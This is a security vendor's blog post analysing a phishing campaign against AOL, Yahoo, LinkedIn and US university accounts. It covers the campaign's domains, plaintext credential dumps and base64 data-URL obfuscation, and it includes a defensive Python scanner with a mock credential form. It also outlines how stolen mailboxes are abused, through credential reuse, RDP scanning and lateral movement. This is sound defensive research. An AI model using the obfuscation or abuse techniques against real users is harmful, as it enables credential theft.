Although most SWG-related blogs talk about exploit kits and malicious code, today we would like to discuss something else: a phishing campaign we recently spotted. Phishing often receives less attention from the InfoSec industry because, unlike exploit kits, it requires user interaction, which means that user education can go a long way in helping cope with phishing attacks. That doesn't necessarily mean, however, that phishing as a whole poses any lesser threat.
As part of a recent research effort we spotted two domains at first, followed by two more, that had successfully compromised a little over 1,000 users. The campaign targeted mainly AOL, but also included phishing pages for Yahoo, LinkedIn and a couple of US universities.
A quick introduction for those who are unfamiliar: phishing is a term used to describe an attack in which the attacker sends a link to a malicious site intended to trick the victim into entering their credentials on that site. The most common form of phishing attack is via unsolicited mail, but phishing attacks can also be executed over Facebook and other social networks, messaging applications, etc.
In the case of an unsolicited email, the attacker makes the sender of the email appear to be a reputable source and encourages the reader to click on a link in the email body.
Since an email can be sent in HTML format, attackers abuse this feature in order to disguise the links so that they appear to be legitimate.
For example, when you read the email below you see the link as "domain.com" but if you click on it, it will lead you to a different domain, which will likely look very similar to the domain you thought you were clicking to visit.
Figure 1: Example of a basic phishing technique
The domain you actually visit, however, is controlled by the attacker, who has changed the login form so that when a victim submits their credentials to the site, they are saved by the attacker for later use.
In most cases, once you've entered your credentials into a phishing page, you are redirected to the original web site that the attacker impersonated. Sometimes you even receive a fake error message before being redirected to the original site, so that you don't suspect any wrongdoing and instead simply assume that you have mistyped your password.
Now that we've established the basics of phishing, let's dig a little deeper into the case at hand.
The first domain we encountered (f4hkn8ty1jety7sysf4hkn8ty.com) looks like a cat walked all over the keyboard and clicked "register" by accident.
Figure 2: How the domain name might have been generated
Although the domain name doesn't really reveal this, this domain was used for phishing AOL accounts:
Figure 3: AOL Phishing page
But what is interesting about this attack is that the actor was very kind and didn't disable directory listing; on top of that, they saved the phished credentials in clear text on the same server:
Figure 4: Directory listing on the phishing server
Figure 5: Credentials stored in plain text in "ole.txt" on the same server
At the time, when we checked the domain on VirusTotal, Trustwave's SWG was the only product on the list to detect this threat:
Figure 6: VirusTotal URL Scan Results
Looking at more data from VirusTotal, it looks like the campaign started around April 9, 2016:
Figure 7: More information about the domain from VirusTotal
Another interesting tidbit we observed was that the domain is registered to "Suzy Leprino" via MELBOURNE IT, which is a domain registrar partner of Yahoo; more on that later.
One more thing that stuck out at us is that the IP behind the domain changed at one point, or more precisely, the hosting provider was changed from Aabaco (Yahoo) in the USA to Ecatel in the Netherlands.
Checking the history of both IPs reveals a long history of badness. It's possible that the US IP was already flagged on many blacklists and the actor wanted to move to a "cleaner" IP.
Figure 8: Information about the new IP address (left) and the old IP address (right)
After further investigation we found another domain that had very similar features: like the previous domain, it hosted an AOL phishing page using the same obfuscation technique, and it also saved the credentials in clear text to the same filename, "ole.txt". It's unlikely that these two facts are coincidental, which implies that the two attacks either utilize the same tool or may even have the same actor behind them both.
Figure 9: Snippet from "ole.txt"
Intel from VirusTotal indicates that the second domain has been in use much longer, so if the domains are indeed connected to the same actor, this campaign began sometime around March 10, 2016:
Figure 10: Additional domain information on nextblum.com
Below are parts of the two phishing pages for similarity comparison:
Figure 11: Code from the first ("cat-generated") domain – error much?
Figure 12: Code from the second (nextblum.com) domain
The only difference between the two is that on the second domain there was a much wider range of phishing pages which included Yahoo, LinkedIn, Old Dominion University, Lehigh University and a generic page that was used to phish various users with .edu emails:
Figure 13: AOL phishing page on nextblum.com
Figure 14: Generic .edu phishing page on nextblum.com
The phishing page in Figure 14 is a phishing scam related to email re-validation. We have been seeing this sort of scam for years, but they appear to be making a comeback recently with a "new" and "stylish" black look.
The actor behind this campaign also used another version of this phishing attack some time ago, around the end of 2015, on the domain data-rice[.]com; we will show the connection later in the blog.
Figure 15: Generic Email Re-validation Phishing on data-rice.com (Archived on PhishTank)
Figure 16: LinkedIn phishing page on nextblum.com
Figure 17: Old Dominion University phishing page on nextblum.com
Figure 18: Lehigh University phishing page on nextblum.com
The attacker behind those domains used Base64-encoding obfuscation in most of their pages. This technique is hardly new: the earliest reference we found to it being used in phishing attacks was in this paper from October 2012, but it is still commonly used in phishing attacks today in combination with various other techniques; an analysis of one such example can be found here. Using this technique gives the attacker two advantages: it obfuscates the code of the HTML page used for phishing, and it loads this content dynamically, so any file-based security solution is likely to miss this threat:
Figure 19: What loading base64 encoded data looks like
Another advantage (or alarming sign for the end user) is that once the page is loaded, the URL in the address bar changes to "data:text/html;base64,<base64_blob_of_the_encoded_html_file>".
This is sometimes an advantage because the user won't see that they are visiting a different domain than they anticipated. In this particular case, visiting f4hkn8ty1jety7sysf4hkn8ty.com instead of aol.com may have alarmed the end user, so seeing "data:text/html;base64" followed by an extremely long URL may actually be a better alternative for an attacker, as many users may dismiss it simply because they do not understand the URL structure at all.
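From the defender's side, the loader technique described above is easy to unwrap: any `data:text/html;base64,` URL or inline `atob("...")` blob can be decoded and the hidden HTML inspected for a credential form. The following is an added example written for this post (it is not code from the original article or from the campaign); the sample page and the `example.invalid` form target are constructed inputs that mimic the pattern, not captured content.

```python
import base64
import re
from html.parser import HTMLParser

# The blob can appear as a data: URL the page navigates to, or as the
# argument of an inline atob("...") call whose result is written into the DOM.
BLOB_RE = re.compile(r'(?:data:text/html;base64,|atob\(\s*["\'])([A-Za-z0-9+/=]{40,})')


class FormScanner(HTMLParser):
    """Collects form targets and whether the decoded HTML has a password field."""

    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True


def scan_page(html):
    """Decode each embedded base64 HTML blob and report any credential form inside."""
    findings = []
    for m in BLOB_RE.finditer(html):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass; skip junk matches
            continue
        s = FormScanner()
        s.feed(decoded)
        findings.append({"decoded_len": len(decoded),
                         "password_field": s.has_password,
                         "form_actions": s.actions})
    return findings


# Constructed sample that mimics the loader pattern; not the actor's page.
_INNER = ('<html><body><form method="post" action="http://example.invalid/post.php">'
          '<input type="text" name="login"><input type="password" name="password">'
          '<input type="submit" value="Sign In"></form></body></html>')
SAMPLE_PAGE = ('<html><body><script>document.write(atob("'
               + base64.b64encode(_INNER.encode()).decode() + '"));</script></body></html>')

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE))
```

A decoded blob that contains a password field posting to a host other than the one the page claims to be is a strong signal worth surfacing in a proxy or mail-gateway rule.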
OK, But why would an attacker be interested in my email? It's full of spam anyway!
The opportunities here are endless, and depend on the attacker, but we'll name a few:
First of all, the attacker can simply sell these credentials to other cybercriminals in bulk, letting them do all the hard work while the attacker continues to plot their next phishing campaign.
The attacker can also dump the contact lists of the phished accounts and sell them as verified legitimate email addresses; other cybercriminals may buy these lists in order to send them spam emails carrying different kinds of Trojans, Pony and Locky to name a few.
The attacker can also use the reputation of these compromised accounts with their contact list in order to send further phishing emails to these contacts. This is more of a social engineering angle of the attack, but wouldn't you trust a link from a colleague/family/friend much more than from an unknown sender?
Another possible attack vector is to look for sensitive information or pictures in these accounts and demand a ransom in order not to publish them; who wouldn't pay to keep their affairs private?
The attacker can also scan the mailbox for other stored credentials, and it's not only the obvious banking or financial credentials that they might be after: do you perhaps have the credentials for your small website in your mailbox? Don't be surprised if your site is soon suspended by the hosting company due to an abuse report; many phishing campaigns are, in fact, run off of compromised sites.
One more attack vector is to try the same email:password combination on other websites. It is known that most people use the same credentials across multiple online sites, and your email address is often used as the username for a website, so the same combination of stolen credentials could also work for your PayPal account, for example, making the attacker's online shopping experience much easier.
As you can see the opportunities here are indeed endless, but this specific attacker was also phishing .EDU mails specifically; we don't know the exact reason why, but on top of the possibilities we named above, phishing .EDU (or many other organizations) addresses has added value:
Many universities use SSO (single sign-on), which basically means that you use the same credentials for all your university services. This means that if I have the password to your email, I also have access to all of the computers that are connected to the university network. Physical access is often not even necessary: some universities provide VPN information publicly, and if that's not available, a simple RDP scan of the university's IP address range may come up with many possible remote terminals.
From within the university network the attacker can then start a lateral movement, so this becomes more of an APT type of attack; combined with sending spear phishing emails to the rest of the .edu contacts in the victim's contact list, an attacker could establish a large foothold in the university network.
Perhaps the attacker was going after something much simpler: many universities offer hosting space that is usually accessible from an online page, where the attacker could host their next phishing campaign. Coming from an .edu domain could bypass many security filters and blacklists, as well as simply seem more like a legitimate URL to end users.
This kind of operation is quite easy to pull off and is also inexpensive for the attacker; a phishing campaign can be set up even with some free hosting services. In the time frame of a few weeks this attacker managed to obtain over 1,000 credentials, which, depending on which of the above methods the attacker chooses to use (if any), could amount to a nice chunk of change.
Do you remember Suzy Leprino from earlier in the post?
Figure 20: Whois info for aninetwolks.com, another domain registered to "Suzy"
Figure 21: List of domains registered to "Suzy"
As you can see, "Suzy" has several domains registered under her name, all of which look somewhat fishy, including data-rice[.]com which we mentioned earlier.
When we began our research we were investigating the phishing attack on the "cat walk" domain, and we contacted the relevant parties at the time to help protect the compromised accounts as well as shut down the infrastructure. While we were waiting for acknowledgment from these parties, we noticed that "Suzy" started using two more of the domains registered to her to spread phishing:
Figure 22: Directory Listing of aninetwolks.com
Figure 23: Same ole.txt file on aninetwolks.com
Figure 24: VirusTotal URL Scan Results for aninetwolks.com
Figure 25: VirusTotal URL Scan Results for jamefgoldstein.com
We don't know if Suzy is a fake identity that the attacker created with the purpose of registering these domains, or whether this is an account that was stolen in an earlier phishing campaign, but as you can see, as soon as the previous two domains started being massively blacklisted, the operation immediately moved to two new, clean domains.
Trustwave SWG protects customers against this, and other, phishing attacks.